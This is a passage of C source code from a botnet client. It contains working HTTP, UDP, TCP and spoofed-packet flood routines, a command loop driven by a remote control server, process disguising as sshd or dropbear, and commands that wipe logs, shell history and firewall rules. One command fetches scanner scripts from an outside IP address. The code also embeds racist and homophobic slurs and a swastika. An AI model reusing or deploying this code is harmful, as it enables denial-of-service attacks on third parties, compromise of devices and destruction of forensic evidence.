  1792. return;
  1793. }
  1794. sleep(5);
  1795. }
  1796. //Cleaning Device
  1797. void RemoveTMP() {
  1798. system("rm -rf /tmp/* /var/* /var/run/* /var/tmp/*");
  1799. system("rm -rf /var/log/wtmp");
  1800. system("history -c;history -w");
  1801. system("rm -rf /var/log/wtmp");
  1802. system("rm -rf /tmp/*");
  1803. system("history -c");
  1804. system("rm -rf ~/.bash_history");
  1805. system("rm -rf /bin/netstat");
  1806. system("history -w");
  1807. system("pkill -9 busybox");
  1808. system("pkill -9 perl");
  1809. system("service iptables stop");
  1810. system("/sbin/iptables -F;/sbin/iptables -X");
  1811. }
  1812. int socket_connect(char *host, in_port_t port) {
  1813. struct hostent *hp;
  1814. struct sockaddr_in addr;
  1815. int on = 1, sock;
  1816. if ((hp = gethostbyname(host)) == NULL) return 0;
  1817. bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
  1818. addr.sin_port = htons(port);
  1819. addr.sin_family = AF_INET;
  1820. sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  1821. setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
  1822. if (sock == -1) return 0;
  1823. if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1)
  1824. return 0;
  1825. return sock;
  1826. }
  1827. void sendHTTP(void *host, char *method, in_port_t port, char *path, int timeFoo, int power) {
  1828. const char *useragents[] = {
  1829. "Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)",
  1830. "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
  1831. "Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
  1832. "Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0",
  1833. "Opera/6.04 (Windows XP; U) [en]",
  1834. "Opera/9.99 (X11; U; sk)",
  1835. "Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5",
  1836. "Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc",
  1837. "Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk",
  1838. "Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
  1839. "Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)",
  1840. "Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15"
  1841. "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
  1842. "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
  1843. "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
  1844. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
  1845. "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
  1846. "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
  1847. "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
  1848. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
  1849. "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
  1850. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
  1851. "Mozilla/5.0 (PLAYSTATION 3; 3.55)",
  1852. "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
  1853. "wii libnup/1.0",
  1854. "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
  1855. "PSP (PlayStation Portable); 2.00",
  1856. "Bunjalloo/0.7.6(Nintendo DS;U;en)",
  1857. "Doris/1.15 [en] (Symbian)",
  1858. "BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  1859. "BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100"
  1860. "findlinks/2.0.1 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  1861. "findlinks/1.1.6-beta6 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  1862. "findlinks/1.1.6-beta4 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  1863. "findlinks/1.1.6-beta1 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  1864. "findlinks/1.1.5-beta7 (+http://wortschatz.uni-leipzig.de/findlinks/)",
  1865. "Mozilla/5.0 (Windows; U; WinNT; en; rv:1.0.2) Gecko/20030311 Beonex/0.8.2-stable",
  1866. "Mozilla/5.0 (Windows; U; WinNT; en; Preview) Gecko/20020603 Beonex/0.8-stable",
  1867. "Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2 (Debian-1.99+2.0b2+dfsg-1)",
  1868. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2",
  1869. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060826 BonEcho/2.0b2",
  1870. "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1b2) Gecko/20060831 BonEcho/2.0b2",
  1871. "Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1b1) Gecko/20060601 BonEcho/2.0b1 (Ubuntu-edgy)",
  1872. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3",
  1873. "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2",
  1874. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2",
  1875. "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2",
  1876. "AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)",
  1877. "AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)"
  1878. "AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)",
  1879. "AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)",
  1880. "AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)",
  1881. "AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)",
  1882. "AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)",
  1883. "AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)",
  1884. "AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)",
  1885. "AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)",
  1886. "AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)",
  1887. "AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)",
  1888. "magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)",
  1889. "Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)",
  1890. "Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)",
  1891. "MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)",
  1892. "MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)",
  1893. "Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)"
  1894. };
  1895. const char *connections[] = {"close", "keep-alive", "accept"};
  1896. int i, timeEnd = time(NULL) + timeFoo;
  1897. char request[512];
  1898. sprintf(request, "%s %s HTTP/1.1\r\nConnection: %s\r\nAccept: */*\r\nUser-Agent: %s\r\n", method, path, connections[(rand() % 3)], useragents[(rand() % 65)]);
  1899. for (i = 0; i < power; i++) {
  1900. if (fork()) {
  1901. while (timeEnd > time(NULL)) {
  1902. int socket = socket_connect((char *)host, port);
  1903. if (socket != 0) {
  1904. write(socket, request, strlen(request));
  1905. close(socket);
  1906. }
  1907. }
  1908. _exit(1);
  1909. }
  1910. }
  1911. }
  1912. void sendSTD(unsigned char *ip, int port, int secs) {
  1913. int iSTD_Sock;
  1914. iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
  1915. time_t start = time(NULL);
  1916. struct sockaddr_in sin;
  1917. struct hostent *hp;
  1918. hp = gethostbyname(ip);
  1919. bzero((char*) &sin,sizeof(sin));
  1920. bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  1921. sin.sin_family = hp->h_addrtype;
  1922. sin.sin_port = port;
  1923. unsigned int a = 0;
  1924. while(1){
  1925. char *randstrings[] = {"arfgG", "HBiug655", "KJYDFyljf754", "LIKUGilkut769458905", "JHFDSkgfc5747694", "GJjyur67458", "RYSDk747586", "HKJGi5r8675", "KHGK7985i", "yuituiILYF", "GKJDghfcjkgd4", "uygtfgtrevf", "tyeuhygbtfvg", "ewqdcftr", "trbazetghhnbrty", "tbhrwsehbg", "twehgbferhb", "etrbhhgetrb", "edfverthbyrtb", "kmiujmnhnhfgn", "zcdbvgdfsbgfd", "gdfbtsdgb", "ghdugffytsdyt", "tgerthgwtrwry", "yteytietyue", "qsortEQS", "8969876hjkghblk", "std", "dts", "hackz", "shdyed", "http", "sghwiondc", "nigger", "pussy", "faggot"};
  1926. char *STD2_STRING = randstrings[rand() % (sizeof(randstrings) / sizeof(char *))];
  1927. if (a >= 50)
  1928. {
  1929. send(iSTD_Sock, STD2_STRING, STD_PIGZ, 0);
  1930. connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
  1931. if (time(NULL) >= start + secs)
  1932. {
  1933. close(iSTD_Sock);
  1934. _exit(0);
  1935. }
  1936. a = 0;
  1937. }
  1938. a++;
  1939. }
  1940. }
  1941. void sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval)
  1942. {
  1943. struct sockaddr_in dest_addr;
  1944. dest_addr.sin_family = AF_INET;
  1945. if(port == 0) dest_addr.sin_port = rand_cmwc();
  1946. else dest_addr.sin_port = htons(port);
  1947. if(getHost(target, &dest_addr.sin_addr)) return;
  1948. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  1949. register unsigned int pollRegister;
  1950. pollRegister = pollinterval;
  1951. if(spoofit == 32)
  1952. {
  1953. int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
  1954. if(!sockfd)
  1955. {
  1956. HackerPrint(D1ckSucka, "Failed opening raw socket.");
  1957. return;
  1958. }
  1959. unsigned char *buf = (unsigned char *)malloc(packetsize + 1);
  1960. if(buf == NULL) return;
  1961. memset(buf, 0, packetsize + 1);
  1962. makeRandomStr(buf, packetsize);
  1963. int end = time(NULL) + timeEnd;
  1964. register unsigned int i = 0;
  1965. while(1)
  1966. {
  1967. sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  1968. if(i == pollRegister)
  1969. {
  1970. if(port == 0) dest_addr.sin_port = rand_cmwc();
  1971. if(time(NULL) > end) break;
  1972. i = 0;
  1973. continue;
  1974. }
  1975. i++;
  1976. }
  1977. } else {
  1978. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
  1979. if(!sockfd)
  1980. {
  1981. HackerPrint(D1ckSucka, "Failed opening raw socket.");
  1982. return;
  1983. }
  1984. int tmp = 1;
  1985. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
  1986. {
  1987. HackerPrint(D1ckSucka, "Failed setting raw headers mode.");
  1988. return;
  1989. }
  1990. int counter = 50;
  1991. while(counter--)
  1992. {
  1993. srand(time(NULL) ^ rand_cmwc());
  1994. init_rand(rand());
  1995. }
  1996. int Jonah;
  1997. in_addr_t netmask;
  1998. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
  1999. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
  2000. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
  2001. struct iphdr *iph = (struct iphdr *)packet;
  2002. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
  2003. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( HackerScan2(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
  2004. udph->len = htons(sizeof(struct udphdr) + packetsize);
  2005. udph->source = rand_cmwc();
  2006. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
  2007. udph->check = 0;
  2008. makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
  2009. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  2010. int end = time(NULL) + timeEnd;
  2011. register unsigned int i = 0;
  2012. while(1)
  2013. {
  2014. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  2015. udph->source = rand_cmwc();
  2016. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
  2017. iph->id = rand_cmwc();
  2018. iph->saddr = htonl( HackerScan2(netmask) );
  2019. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  2020. if(i == pollRegister)
  2021. {
  2022. if(time(NULL) > end) break;
  2023. i = 0;
  2024. continue;
  2025. }
  2026. i++;
  2027. }
  2028. }
  2029. }
  2030. void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval)
  2031. {
  2032. register unsigned int pollRegister;
  2033. pollRegister = pollinterval;
  2034. struct sockaddr_in dest_addr;
  2035. dest_addr.sin_family = AF_INET;
  2036. if(port == 0) dest_addr.sin_port = rand_cmwc();
  2037. else dest_addr.sin_port = htons(port);
  2038. if(getHost(target, &dest_addr.sin_addr)) return;
  2039. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  2040. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
  2041. if(!sockfd)
  2042. {
  2043. HackerPrint(D1ckSucka, "Failed opening raw socket.");
  2044. return;
  2045. }
  2046. int tmp = 1;
  2047. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
  2048. {
  2049. HackerPrint(D1ckSucka, "Failed setting raw headers mode.");
  2050. return;
  2051. }
  2052. in_addr_t netmask;
  2053. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
  2054. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
  2055. unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
  2056. struct iphdr *iph = (struct iphdr *)packet;
  2057. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
  2058. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( HackerScan2(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
  2059. tcph->source = rand_cmwc();
  2060. tcph->seq = rand_cmwc();
  2061. tcph->ack_seq = 0;
  2062. tcph->doff = 5;
  2063. if(!strcmp(flags, "all"))
  2064. {
  2065. tcph->syn = 1;
  2066. tcph->rst = 1;
  2067. tcph->fin = 1;
  2068. tcph->ack = 1;
  2069. tcph->psh = 1;
  2070. } else {
  2071. unsigned char *pch = strtok(flags, ",");
  2072. while(pch)
  2073. {
  2074. if(!strcmp(pch, "syn"))
  2075. {
  2076. tcph->syn = 1;
  2077. } else if(!strcmp(pch, "rst"))
  2078. {
  2079. tcph->rst = 1;
  2080. } else if(!strcmp(pch, "fin"))
  2081. {
  2082. tcph->fin = 1;
  2083. } else if(!strcmp(pch, "ack"))
  2084. {
  2085. tcph->ack = 1;
  2086. } else if(!strcmp(pch, "psh"))
  2087. {
  2088. tcph->psh = 1;
  2089. } else {
  2090. HackerPrint(D1ckSucka, "Invalid flag \"%s\"", pch);
  2091. }
  2092. pch = strtok(NULL, ",");
  2093. }
  2094. }
  2095. tcph->window = rand_cmwc();
  2096. tcph->check = 0;
  2097. tcph->urg_ptr = 0;
  2098. tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
  2099. tcph->check = tcpcsum(iph, tcph);
  2100. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  2101. int end = time(NULL) + timeEnd;
  2102. register unsigned int i = 0;
  2103. while(1)
  2104. {
  2105. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  2106. iph->saddr = htonl( HackerScan2(netmask) );
  2107. iph->id = rand_cmwc();
  2108. tcph->seq = rand_cmwc();
  2109. tcph->source = rand_cmwc();
  2110. tcph->check = 0;
  2111. tcph->check = tcpcsum(iph, tcph);
  2112. iph->check = csum ((unsigned short *) packet, iph->tot_len);
  2113. if(i == pollRegister)
  2114. {
  2115. if(time(NULL) > end) break;
  2116. i = 0;
  2117. continue;
  2118. }
  2119. i++;
  2120. }
  2121. }
  2122. void processCmd(int argc, unsigned char *argv[])
  2123. {
  2124. int x;
  2125. if(!strcmp(argv[0], "PING"))
  2126. {
  2127. HackerPrint(D1ckSucka, "PONG!");
  2128. return;
  2129. }
  2130. if(!strcmp(argv[0], "GETLOCALIP"))
  2131. {
  2132. HackerPrint(D1ckSucka, "My IP: %s", inet_ntoa(ourIP));
  2133. return;
  2134. }
  2135. if(!strcmp(argv[0], "PYTHON"))
  2136. {
  2137. if(argc != 2)
  2138. {
  2139. HackerPrint(D1ckSucka, "PYTHON RANGE [1,2,3,4]");
  2140. return;
  2141. }
  2142. if(!strcmp(argv[1], "0FF"))
  2143. {
  2144. system("pkill -9 python");
  2145. system("history -c");
  2146. }
  2147. if(!strcmp(argv[1], "DOWNLOAD"))
  2148. {
  2149. system("yum install python-paramiko -y;apt-get install python-paramiko -y;mkdir /.tmp;cd /.tmp;wget http://46.166.185.18 /purge.py");
  2150. HackerPrint(D1ckSucka, "Installs For Python");
  2151. }
  2152. if(!strcmp(argv[1], "1"))
  2153. {
  2154. system("cd /.tmp;python purge.py 500 SATAN 1 3");
  2155. HackerPrint(D1ckSucka, "Conncted To Python Scanner");
  2156. }
  2157. if(!strcmp(argv[1], "2"))
  2158. {
  2159. system("cd /.tmp;python good2.py 1 LUCKY 1 1");
  2160. HackerPrint(D1ckSucka, "Conncted To Good.py Scanner");
  2161. }
  2162. if(!strcmp(argv[1], "3"))
  2163. {
  2164. system("cd /.tmp;python purge.py 500 B 122.3 3");
  2165. HackerPrint(D1ckSucka, "Conncted To Python Scanner");
  2166. }
  2167. }
  2168. if(!strcmp(argv[0], "NETIS"))
  2169. {
  2170. if(!strcmp(argv[1], "ON"))
  2171. {
  2172. StartTheNetis();
  2173. _exit(0);
  2174. }
  2175. }
  2176. if(!strcmp(argv[0], "BOTKILL"))
  2177. {
  2178. if(!listFork())
  2179. {
  2180. HackerPrint(D1ckSucka, "Killing Bots");
  2181. botkiller();
  2182. RemoveTMP();
  2183. _exit(0);
  2184. }
  2185. }
  2186. if(!strcmp(argv[0], "LOOPME"))
  2187. {
  2188. if(!listFork())
  2189. {
  2190. HackerPrint(D1ckSucka, "LOOPING PAYLOAD");
  2191. LoopPayload();
  2192. _exit(0);
  2193. }
  2194. }
  2195. if(!strcmp(argv[0], "SCANNER"))
  2196. {
  2197. if(argc != 2)
  2198. {
  2199. HackerPrint(D1ckSucka, "SCANNER ON | OFF");
  2200. return;
  2201. }
  2202. if(!strcmp(argv[1], "OFF"))
  2203. {
  2204. if(scanPid == 0) return;
  2205. kill(scanPid, 9);
  2206. HackerPrint(D1ckSucka, "OFF");
  2207. scanPid = 0;
  2208. }
  2209. if(!strcmp(argv[1], "ON"))
  2210. {
  2211. if(scanPid != 0) return;
  2212. uint32_t parent;
  2213. parent = fork();
  2214. if (parent > 0) { scanPid = parent; return;}
  2215. else if(parent == -1) return;
  2216. HackerPrint(D1ckSucka, "\x1b[2;31m卐HIJACKING卐 \x1b[0;37m-> %s", inet_ntoa(ourIP));
  2217. StartTheLelz();
  2218. _exit(0);
  2219. }
  2220. }
  2221. if(!strcmp(argv[0], "UDP"))
  2222. {
  2223. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[5]) == -1 || atoi(argv[5]) > 65500 || atoi(argv[4]) > 32 || (argc == 7 && atoi(argv[6]) < 1))
  2224. {
  2225. return;
  2226. }
  2227. unsigned char *ip = argv[1];
  2228. int port = atoi(argv[2]);
  2229. int time = atoi(argv[3]);
  2230. int spoofed = atoi(argv[4]);
  2231. int packetsize = atoi(argv[5]);
  2232. int pollinterval = (argc == 7 ? atoi(argv[6]) : 10);
  2233. if(strstr(ip, ",") != NULL)
  2234. {
  2235. unsigned char *hi = strtok(ip, ",");
  2236. while(hi != NULL)
  2237. {
  2238. if(!listFork())
  2239. {
  2240. sendUDP(hi, port, time, spoofed, packetsize, pollinterval);
  2241. _exit(0);
  2242. }
  2243. hi = strtok(NULL, ",");
  2244. }
  2245. } else {
  2246. if (listFork()) { return; }
  2247. sendUDP(ip, port, time, spoofed, packetsize, pollinterval);
  2248. _exit(0);
  2249. }
  2250. }
  2251. if (!strcmp((const char *)argv[0], "HTTP")) {
  2252. if (argc < 6)
  2253. {
  2254. return;
  2255. }
  2256. if (strstr((const char *)argv[1], ",") != NULL) {
  2257. unsigned char *hi = (unsigned char *)strtok((char *)argv[1], ",");
  2258. while (hi != NULL) {
  2259. if (!listFork()) {
  2260. sendHTTP((char*)argv[1], (char*)argv[2], atoi((char*)argv[3]), (char*)argv[4], atoi((char*)argv[5]), atoi((char*)argv[6]));
  2261. _exit(0);
  2262. }
  2263. hi = (unsigned char *)strtok(NULL, ",");
  2264. }
  2265. } else {
  2266. if (listFork()) {
  2267. return;
  2268. }
  2269. sendHTTP((char*)argv[1], (char*)argv[2], atoi((char*)argv[3]), (char*)argv[4], atoi((char*)argv[5]), atoi((char*)argv[6]));
  2270. _exit(0);
  2271. }
  2272. }
  2273. if(!strcmp(argv[0], "STD"))
  2274. {
  2275. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
  2276. {
  2277. return;
  2278. }
  2279. unsigned char *ip = argv[1];
  2280. int port = atoi(argv[2]);
  2281. int time = atoi(argv[3]);
  2282. if(strstr(ip, ",") != NULL)
  2283. {
  2284. unsigned char *hi = strtok(ip, ",");
  2285. while(hi != NULL)
  2286. {
  2287. if(!listFork())
  2288. {
  2289. sendSTD(hi, port, time);
  2290. _exit(0);
  2291. }
  2292. hi = strtok(NULL, ",");
  2293. }
  2294. } else {
  2295. if (listFork()) { return; }
  2296. sendSTD(ip, port, time);
  2297. _exit(0);
  2298. }
  2299. }
  2300. if(!strcmp(argv[0], "TCP"))
  2301. {
  2302. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 32 || (argc > 6 && atoi(argv[6]) < 0) || (argc == 8 && atoi(argv[7]) < 1))
  2303. {
  2304. return;
  2305. }
  2306. unsigned char *ip = argv[1];
  2307. int port = atoi(argv[2]);
  2308. int time = atoi(argv[3]);
  2309. int spoofed = atoi(argv[4]);
  2310. unsigned char *flags = argv[5];
  2311. int pollinterval = argc == 8 ? atoi(argv[7]) : 10;
  2312. int psize = argc > 6 ? atoi(argv[6]) : 0;
  2313. if(strstr(ip, ",") != NULL)
  2314. {
  2315. unsigned char *hi = strtok(ip, ",");
  2316. while(hi != NULL)
  2317. {
  2318. if(!listFork())
  2319. {
  2320. sendTCP(hi, port, time, spoofed, flags, psize, pollinterval);
  2321. _exit(0);
  2322. }
  2323. hi = strtok(NULL, ",");
  2324. }
  2325. } else {
  2326. if (listFork()) { return; }
  2327. sendTCP(ip, port, time, spoofed, flags, psize, pollinterval);
  2328. _exit(0);
  2329. }
  2330. }
  2331. if(!strcmp(argv[0], "STOP"))
  2332. {
  2333. int killed = 0;
  2334. unsigned long i;
  2335. for (i = 0; i < numpids; i++) {
  2336. if (pids[i] != 0 && pids[i] != getpid()) {
  2337. kill(pids[i], 9);
  2338. killed++;
  2339. }
  2340. }
  2341. }
  2342. if(!strcmp(argv[0], "HOODASSSHIT"))
  2343. {
  2344. exit(0);
  2345. }
  2346. }
  2347. int initConnection()
  2348. {
  2349. unsigned char server[4096];
  2350. memset(server, 0, 4096);
  2351. if(D1ckSucka) { close(D1ckSucka); D1ckSucka = 0; }
  2352. if(D1ckSuckaz + 1 == SERVER_LIST_SEX) D1ckSuckaz = 0;
  2353. else D1ckSuckaz++;
  2354. strcpy(server, hekkertelnet[D1ckSuckaz]);
  2355. int port = Server_Botport;
  2356. if(strchr(server, ':') != NULL)
  2357. {
  2358. port = atoi(strchr(server, ':') + 1);
  2359. *((unsigned char *)(strchr(server, ':'))) = 0x0;
  2360. }
  2361. D1ckSucka = socket(AF_INET, SOCK_STREAM, 0);
  2362. if(!connectTimeout(D1ckSucka, server, port, 30)) return 1;
  2363. return 0;
  2364. }
  2365. int getOurIP()
  2366. {
  2367. int sock = socket(AF_INET, SOCK_DGRAM, 0);
  2368. if(sock == -1) return 0;
  2369. struct sockaddr_in serv;
  2370. memset(&serv, 0, sizeof(serv));
  2371. serv.sin_family = AF_INET;
  2372. serv.sin_addr.s_addr = inet_addr("8.8.8.8");
  2373. serv.sin_port = htons(53);
  2374. int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
  2375. if(err == -1) return 0;
  2376. struct sockaddr_in name;
  2377. socklen_t namelen = sizeof(name);
  2378. err = getsockname(sock, (struct sockaddr*) &name, &namelen);
  2379. if(err == -1) return 0;
  2380. ourIP.s_addr = name.sin_addr.s_addr;
  2381. int cmdline = open("/proc/net/route", O_RDONLY);
  2382. char linebuf[4096];
  2383. while(fdgets(linebuf, 4096, cmdline) != NULL)
  2384. {
  2385. if(strstr(linebuf, "\t00000000\t") != NULL)
  2386. {
  2387. unsigned char *pos = linebuf;
  2388. while(*pos != '\t') pos++;
  2389. *pos = 0;
  2390. break;
  2391. }
  2392. memset(linebuf, 0, 4096);
  2393. }
  2394. close(cmdline);
  2395. if(*linebuf)
  2396. {
  2397. int i;
  2398. struct ifreq ifr;
  2399. strcpy(ifr.ifr_name, linebuf);
  2400. ioctl(sock, SIOCGIFHWADDR, &ifr);
  2401. for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
  2402. }
  2403. close(sock);
  2404. }
  2405. char *getBuild()
  2406. {
  2407. if(access("/usr/bin/python", F_OK) != -1){
  2408. return "SERVER";
  2409. } else {
  2410. return "ROUTER";
  2411. }
  2412. }
  2413. int main(int argc, unsigned char *argv[])
  2414. {
  2415. char *mynameis = "";
  2416. if(access("/usr/bin/python", F_OK) != -1){
  2417. mynameis = "sshd";
  2418. } else {
  2419. mynameis = "/usr/sbin/dropbear";
  2420. }
  2421. if(geteuid() == 0){
  2422. userID = 0;
  2423. }
  2424. char *Buildz = getBuild();
  2425. if(Buildz == "SERVER")
  2426. {
  2427. //If python is installed
  2428. } else {
  2429. //If python is not installed
  2430. }
  2431. if(SERVER_LIST_SEX <= 0) return 0;
  2432. printf("BUILD %s:%s\n", getBuild(), inet_ntoa(ourIP));
  2433. strncpy(argv[0],"",strlen(argv[0]));
  2434. sprintf(argv[0], mynameis);
  2435. prctl(PRE_SET_SEX, (unsigned long) mynameis, 0, 0, 0);
  2436. srand(time(NULL) ^ getpid());
  2437. init_rand(time(NULL) ^ getpid());
  2438. pid_t pid1;
  2439. pid_t pid2;
  2440. int status;
  2441. getOurIP();
  2442. if (pid1 = fork()) {
  2443. waitpid(pid1, &status, 0);
  2444. exit(0);
  2445. } else if (!pid1) {
  2446. if (pid2 = fork()) {
  2447. exit(0);
  2448. } else if (!pid2) {
  2449. } else {
  2450. //N
  2451. }
  2452. } else {
  2453. //N
  2454. }
  2455. setsid();
  2456. chdir("/");
  2457. signal(SIGPIPE, SIG_IGN);
  2458. while(1)
  2459. {
  2460. if(initConnection()) { sleep(5); continue; }
  2461. HackerPrint(D1ckSucka, "\x1b[1;31mConnected | \x1b[1;34m IP: %s | \x1b[1;32m Type: %s | \x1b[1;96m Version: %s", inet_ntoa(ourIP), getBuild(), VERSION);
  2462. char commBuf[4096];
  2463. int got = 0;
  2464. int i = 0;
  2465. while((got = recvLine(D1ckSucka, commBuf, 4096)) != -1)
  2466. {
  2467. for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
  2468. unsigned int *newpids, on;
  2469. for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
  2470. pids[on - 1] = 0;
  2471. numpids--;
  2472. newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
  2473. for (on = 0; on < numpids; on++) newpids[on] = pids[on];
  2474. free(pids);
  2475. pids = newpids;
  2476. }
  2477. commBuf[got] = 0x00;
  2478. trim(commBuf);
  2479. if(strstr(commBuf, "PING") == commBuf)
  2480. {
